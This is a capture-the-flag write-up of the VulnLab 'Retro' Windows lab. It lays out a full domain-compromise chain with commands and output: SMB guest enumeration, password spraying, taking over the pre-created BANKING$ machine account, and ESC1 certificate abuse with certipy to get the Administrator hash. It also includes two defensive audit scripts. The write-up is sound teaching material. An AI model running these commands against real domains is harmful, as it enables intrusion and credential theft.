VulnLab - Retro Writeup

Liam Geyer

👾 Machine Overview


This is a writeup of the machine Retro from VulnLab. It's an easy-difficulty Windows machine that features a pre-created machine account.

πŸ” Enumeration

An initial nmap scan of the host gave the following results:

nmap -sV -sC -Pn 10.10.122.138
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-14 19:28 EDT
Stats: 0:00:01 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 0.50% done
Stats: 0:00:03 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 1.00% done; ETC: 19:33 (0:04:57 remaining)
Nmap scan report for 10.10.122.138
Host is up (0.10s latency).
Not shown: 995 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-10-14 23:28:49Z)
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
|_ssl-date: 2024-10-14T23:29:01+00:00; -2s from scanner time.
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2023-07-23T21:06:31
|_Not valid after: 2024-07-22T21:06:31
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2023-07-23T21:06:31
|_Not valid after: 2024-07-22T21:06:31
|_ssl-date: 2024-10-14T23:29:01+00:00; -2s from scanner time.
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -2s, deviation: 0s, median: -2s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.38 seconds

I started off by adding retro.vl and dc.retro.vl to my /etc/hosts.

🏁 Initial Access

I tried anonymous LDAP binds to no avail, but I was able to authenticate over SMB using the Guest account.

nxc smb retro.vl -u "Guest" -p ""
SMB 10.10.122.138 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.10.122.138 445 DC [+] retro.vl\Guest:

From here, I brute-forced RIDs to get a user list.

nxc smb retro.vl -u "Guest" -p "" --rid-brute

Here’s our list of accounts:

jburley
HelpDesk
tblack
trainee
DC$
BANKING$

I tried spraying an empty password at all of these accounts, and got a hit for the HelpDesk account.

nxc smb retro.vl -u user.list -p "" --continue-on-success
SMB 10.10.122.138 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.10.122.138 445 DC [-] retro.vl\DC$: STATUS_LOGON_FAILURE
SMB 10.10.122.138 445 DC [-] retro.vl\BANKING$: STATUS_LOGON_FAILURE
SMB 10.10.122.138 445 DC [-] retro.vl\jburley: STATUS_LOGON_FAILURE
SMB 10.10.122.138 445 DC [+] retro.vl\HelpDesk:
SMB 10.10.122.138 445 DC [-] retro.vl\tblack: STATUS_LOGON_FAILURE
SMB 10.10.122.138 445 DC [-] retro.vl\trainee: STATUS_LOGON_FAILURE

📂 SMB

Anonymous access was allowed for SMB, and there was an interesting share, Trainees.

smbclient -L //retro.vl//
Password for [WORKGROUP\lfgberg]:

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Notes Disk
SYSVOL Disk Logon server share
Trainees Disk
SMB1 disabled -- no workgroup available

Within that share is the file Important.txt.

smb: \> dir
. D 0 Sun Jul 23 17:58:43 2023
.. DHS 0 Wed Jul 26 05:54:14 2023
Important.txt A 288 Sun Jul 23 18:00:13 2023

6261499 blocks of size 4096. 2266513 blocks available
smb: \> get Important.txt
getting file \Important.txt of size 288 as Important.txt (0.6 KiloBytes/sec) (average 0.6 KiloBytes/sec)

The file says that the admins have rolled all their trainees into a single account with an easy-to-remember password.

Dear Trainees,

I know that some of you seemed to struggle with remembering strong and unique passwords.
So we decided to bundle every one of you up into one account.
Stop bothering us. Please. We have other stuff to do than resetting your password every day.

Regards

The Admins%

I tried out the creds trainee:trainee, and they worked to authenticate via LDAP.

nxc ldap retro.vl -u "trainee" -p "trainee"
SMB 10.10.122.138 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
LDAP 10.10.122.138 389 DC [+] retro.vl\trainee:trainee

Now as the trainee, we can access the Notes share.

❯ smbclient -U trainee%trainee \\\\retro.vl\\Notes
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sun Jul 23 18:03:16 2023
.. DHS 0 Wed Jul 26 05:54:14 2023
ToDo.txt A 248 Sun Jul 23 18:05:56 2023
g
6261499 blocks of size 4096. 2889722 blocks available
smb: \> get ToDo.txt
getting file \ToDo.txt of size 248 as ToDo.txt (0.6 KiloBytes/sec) (average 0.6 KiloBytes/sec)
smb: \>

There’s a ToDo file we can grab.

Thomas,

after convincing the finance department to get rid of their ancienct banking software
it is finally time to clean up the mess they made. We should start with the pre created
computer account. That one is older than me.

Best

James

👴💻 Pre-Created Machine Account

The ToDo file contains a note which talks about a pre-created machine account. When a machine account is created with "Assign this computer account as a pre-Windows 2000 computer" checked, its initial password is the account name in lowercase without the trailing $ (banking for BANKING$). If nobody has authenticated with the account yet, we can change its password.

First we need to try to authenticate to the account:

smbclient -U BANKING$%banking \\\\retro.vl\\Notes
session setup failed: NT_STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT
smbclient -U BANKING$%notthepass \\\\retro.vl\\Notes
session setup failed: NT_STATUS_LOGON_FAILURE

We get NT_STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT with the password banking but NT_STATUS_LOGON_FAILURE with a wrong password. The first status means the credentials were accepted and only the logon type was refused for a workstation trust account, so the password is correct and this looks to be the case.
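From the defender's side, the account pattern described above is easy to audit: a pre-created computer object that was never joined still carries the pre-Windows 2000 flag (PASSWD_NOTREQD together with WORKSTATION_TRUST_ACCOUNT, userAccountControl 0x1020), has no logon history, and a pwdLastSet no later than whenCreated. The script below is an added example for this writeup, not the author's code or any tool's output. It assumes an LDAP export of computer objects whose timestamps were already converted to ISO 8601 strings; BANKING$ is modelled on the machine, the other objects are constructed for contrast.

```python
"""Audit computer accounts for the pre-created (pre-Windows 2000) pattern.

Added example for this writeup, not the author's code or any tool's output.
Assumptions: records come from an LDAP export of computer objects, with
pwdLastSet and whenCreated already converted to ISO 8601 strings.
"""
from datetime import datetime, timezone

# userAccountControl bits as documented by Microsoft
UF_ACCOUNTDISABLE = 0x0002
UF_PASSWD_NOTREQD = 0x0020
UF_WORKSTATION_TRUST_ACCOUNT = 0x1000
UF_SERVER_TRUST_ACCOUNT = 0x2000
UF_TRUSTED_FOR_DELEGATION = 0x80000

# Constructed sample export (not real directory data). BANKING$ mirrors the
# writeup; DC$, WS01$ and OLDLAB$ are invented for contrast.
SAMPLE_COMPUTERS = [
    {"sAMAccountName": "DC$",  # domain controller, regularly rotating its password
     "userAccountControl": UF_SERVER_TRUST_ACCOUNT | UF_TRUSTED_FOR_DELEGATION,
     "logonCount": 412,
     "whenCreated": "2023-07-23T21:00:00Z", "pwdLastSet": "2024-09-01T10:00:00Z"},
    {"sAMAccountName": "BANKING$",  # pre-created, never joined: UAC 0x1020 (4128)
     "userAccountControl": UF_WORKSTATION_TRUST_ACCOUNT | UF_PASSWD_NOTREQD,
     "logonCount": 0,
     "whenCreated": "2023-07-23T21:10:00Z", "pwdLastSet": "2023-07-23T21:10:00Z"},
    {"sAMAccountName": "WS01$",  # ordinary joined workstation
     "userAccountControl": UF_WORKSTATION_TRUST_ACCOUNT,
     "logonCount": 57,
     "whenCreated": "2023-08-01T08:00:00Z", "pwdLastSet": "2024-10-01T08:00:00Z"},
    {"sAMAccountName": "OLDLAB$",  # pre-created but disabled: cannot be logged on with
     "userAccountControl": UF_WORKSTATION_TRUST_ACCOUNT | UF_PASSWD_NOTREQD | UF_ACCOUNTDISABLE,
     "logonCount": 0,
     "whenCreated": "2022-01-01T00:00:00Z", "pwdLastSet": "2022-01-01T00:00:00Z"},
]


def _ts(value):
    """Parse an ISO 8601 timestamp with a trailing Z into an aware datetime."""
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def indicators(computer):
    """Return the pre-created indicators present on one computer object."""
    uac = computer["userAccountControl"]
    found = []
    if uac & UF_WORKSTATION_TRUST_ACCOUNT and uac & UF_PASSWD_NOTREQD:
        found.append("PASSWD_NOTREQD on workstation trust account")
    if computer["logonCount"] == 0:
        found.append("never logged on")
    if _ts(computer["pwdLastSet"]) <= _ts(computer["whenCreated"]):
        found.append("password unchanged since creation")
    return found


def likely_precreated(computer):
    """True when the account is enabled, carries the pre-Windows 2000 flag and
    has never logged on, i.e. it still has its creation-time password."""
    if computer["userAccountControl"] & UF_ACCOUNTDISABLE:
        return False
    found = indicators(computer)
    return ("PASSWD_NOTREQD on workstation trust account" in found
            and "never logged on" in found)


def audit(computers, now=None):
    """Map each flagged account to its indicators and age in days for triage.
    `now` is injectable so the report is reproducible."""
    now = now or datetime.now(timezone.utc)
    report = {}
    for c in computers:
        if likely_precreated(c):
            age_days = (now - _ts(c["whenCreated"])).days
            report[c["sAMAccountName"]] = {"indicators": indicators(c), "age_days": age_days}
    return report


if __name__ == "__main__":
    for name, info in audit(SAMPLE_COMPUTERS).items():
        print(f"{name}: {', '.join(info['indicators'])} ({info['age_days']} days old)")
```

Flagged accounts that nobody plans to join should be deleted; ones that are still needed get a fresh random password or are recreated without the pre-Windows 2000 option. The disabled OLDLAB$ is deliberately excluded from the report because it cannot be used for logon, which is the same reason disabling such accounts is an acceptable interim control.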

We can use Impacket’s changepasswd.py to reset the password.

changepasswd.py -protocol rpc-samr retro.vl/BANKING\$@10.10.122.138 -newpass Password123
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

Current password:
[*] Changing the password of retro.vl\BANKING$
[*] Connecting to DCE/RPC as retro.vl\BANKING$
[*] Password was changed successfully.

🏦 Banking

Next, I ran BloodHound to see what our BANKING$ account can do.

bloodhound-python -d retro.vl -u BANKING$ -p 'Password123' -ns 10.10.122.138 -c all
INFO: Found AD domain: retro.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.retro.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: dc.retro.vl
INFO: Found 7 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 20 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer:
INFO: Querying computer: DC.retro.vl
INFO: Done in 00M 20S

I didn't see anything fun here, so I ran certipy find next to see if there were any vulnerable certificate templates in AD CS.

The RetroClients template looks to be vulnerable to good old ESC1.

"Certificate Templates": {
    "0": {
        "Template Name": "RetroClients",
        "Display Name": "Retro Clients",
        "Certificate Authorities": [
            "retro-DC-CA"
        ],
        "Enabled": true,
        "Client Authentication": true,
        "Enrollment Agent": false,
        "Any Purpose": false,
        "Enrollee Supplies Subject": true,
        "Certificate Name Flag": [
            "EnrolleeSuppliesSubject"
        ],
        "Enrollment Flag": [
            "None"
        ],
        "Private Key Flag": [
            "16842752"
        ],
        "Extended Key Usage": [
            "Client Authentication"
        ],
        "Requires Manager Approval": false,
        "Requires Key Archival": false,
        "Authorized Signatures Required": 0,
        "Validity Period": "1 year",
        "Renewal Period": "6 weeks",
        "Minimum RSA Key Length": 4096,
        "Permissions": {
            "Enrollment Permissions": {
                "Enrollment Rights": [
                    "RETRO.VL\\Domain Admins",
                    "RETRO.VL\\Domain Computers",
                    "RETRO.VL\\Enterprise Admins"
                ]
            },
            "Object Control Permissions": {
                "Owner": "RETRO.VL\\Administrator",
                "Write Owner Principals": [
                    "RETRO.VL\\Domain Admins",
                    "RETRO.VL\\Enterprise Admins",
                    "RETRO.VL\\Administrator"
                ],
                "Write Dacl Principals": [
                    "RETRO.VL\\Domain Admins",
                    "RETRO.VL\\Enterprise Admins",
                    "RETRO.VL\\Administrator"
                ],
                "Write Property Principals": [
                    "RETRO.VL\\Domain Admins",
                    "RETRO.VL\\Enterprise Admins",
                    "RETRO.VL\\Administrator"
                ]
            }
        },
        "[!] Vulnerabilities": {
            "ESC1": "'RETRO.VL\\\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication"
        }
    }
}

Domain Computers have enrollment rights, the enrollee supplies the subject, and the template allows client authentication, with no manager approval or authorized signatures required: that is the ESC1 combination. Since BANKING$ is a member of Domain Computers, we can use it to perform this attack.
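The ESC1 conditions above can be checked mechanically against the key/value layout Certipy prints, which is what a defender reviewing templates wants. The script below is an added example for this writeup; it is neither the author's code nor part of Certipy. It reproduces the RetroClients entry above as RETRO_CLIENTS and constructs a hardened copy for contrast (the group name Retro Client Admins in that copy is made up).

```python
"""Flag AD CS templates that meet the ESC1 preconditions.

Added example for this writeup, not the author's code and not part of Certipy.
Input is a template in the key/value layout Certipy prints.
"""
import copy

# Principals broad enough that granting them enrollment means "anyone in the
# domain". Matching is case-insensitive and ignores the DOMAIN\ prefix.
LOW_PRIV_PRINCIPALS = {"domain computers", "domain users", "authenticated users", "everyone"}

# The RetroClients template from the writeup (fields relevant to ESC1).
RETRO_CLIENTS = {
    "Template Name": "RetroClients",
    "Enabled": True,
    "Client Authentication": True,
    "Any Purpose": False,
    "Enrollee Supplies Subject": True,
    "Requires Manager Approval": False,
    "Authorized Signatures Required": 0,
    "Minimum RSA Key Length": 4096,
    "Permissions": {
        "Enrollment Permissions": {
            "Enrollment Rights": [
                "RETRO.VL\\Domain Admins",
                "RETRO.VL\\Domain Computers",
                "RETRO.VL\\Enterprise Admins",
            ]
        }
    },
}


def _bare(principal):
    """'RETRO.VL\\Domain Computers' -> 'domain computers'."""
    return principal.split("\\", 1)[-1].lower()


def low_priv_enrollers(template):
    """Enrollment principals that are effectively everyone."""
    rights = template["Permissions"]["Enrollment Permissions"]["Enrollment Rights"]
    return [p for p in rights if _bare(p) in LOW_PRIV_PRINCIPALS]


def esc1_missing(template):
    """Return the ESC1 conditions this template does NOT satisfy.
    An empty list means every condition holds and the template is ESC1."""
    checks = [
        ("enabled", template.get("Enabled", False)),
        ("enrollee supplies subject", template.get("Enrollee Supplies Subject", False)),
        ("authentication EKU",
         template.get("Client Authentication", False) or template.get("Any Purpose", False)),
        ("no manager approval", not template.get("Requires Manager Approval", False)),
        ("no authorized signatures", template.get("Authorized Signatures Required", 0) == 0),
        ("low-privileged enrollers", bool(low_priv_enrollers(template))),
    ]
    return [name for name, ok in checks if not ok]


def esc1(template):
    return not esc1_missing(template)


def hardened(template):
    """Copy of the template with the two fixes a defender would apply: the CA
    builds the subject from AD, and enrollment is limited to an explicit group
    (constructed name, not from the writeup)."""
    fixed = copy.deepcopy(template)
    fixed["Enrollee Supplies Subject"] = False
    fixed["Permissions"]["Enrollment Permissions"]["Enrollment Rights"] = [
        "RETRO.VL\\Retro Client Admins"
    ]
    return fixed


if __name__ == "__main__":
    for t in (RETRO_CLIENTS, hardened(RETRO_CLIENTS)):
        print(t["Template Name"], "ESC1" if esc1(t) else "ok", esc1_missing(t))
```

Either fix alone is enough to break ESC1, since all conditions must hold; requiring manager approval is a third option when the template must keep enrollee-supplied subjects. The output later in this writeup also notes "Certificate has no object SID": since the KB5014754 strong-mapping changes, a domain controller in enforcement mode rejects a certificate that lacks the SID security extension for authentication, which is a further reason to keep DCs on the enforced setting.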

First we need to request a certificate, supplying the Administrator's UPN as the subject alternative name.

certipy req -username BANKING\$@retro.vl -password Password123 -target-ip 10.10.122.138 -ca 'retro-DC-CA' -template 'RetroClients' -upn '[email protected]'

This didn't work; I kept getting a key-size error, because the template's Minimum RSA Key Length is 4096 and Certipy generates a smaller key by default. We can fix this by appending -key-size 4096.

certipy req -username BANKING\$@retro.vl -password Password123 -target-ip 10.10.122.138 -ca 'retro-DC-CA' -template 'RetroClients' -upn '[email protected]' -key-size 4096 -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[+] Trying to resolve 'RETRO.VL' at '127.0.0.53'
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.10.122.138[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.10.122.138[\pipe\cert]
[*] Successfully requested certificate
[*] Request ID is 12
[*] Got certificate with UPN '[email protected]'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

Now, we can authenticate with this certificate to get the admin’s hash.

certipy auth -pfx 'administrator.pfx' -username 'Administrator' -domain 'retro.vl' -dc-ip 10.10.122.138
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: [email protected]
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for '[email protected]': [SNIPPED]

Lastly, we can use this to WinRM in and grab the flag, YIPPEE!

📖 Resources

MindPoint: GPP PrivEsc
TrustedSec: Pre-Created Machine Accounts
CyberSec Notes: Pre-Created Machine Accounts
CyberSec Notes: ESC1
  • Title: VulnLab - Retro Writeup
  • Author: Liam Geyer
  • Created at: 2024-12-27 00:00:00
  • Updated at: 2024-12-27 22:33:29
  • Link: https://lfgberg.org/2024/12/27/vulnlab/retro/
  • License: This work is licensed under CC BY-NC-SA 4.0.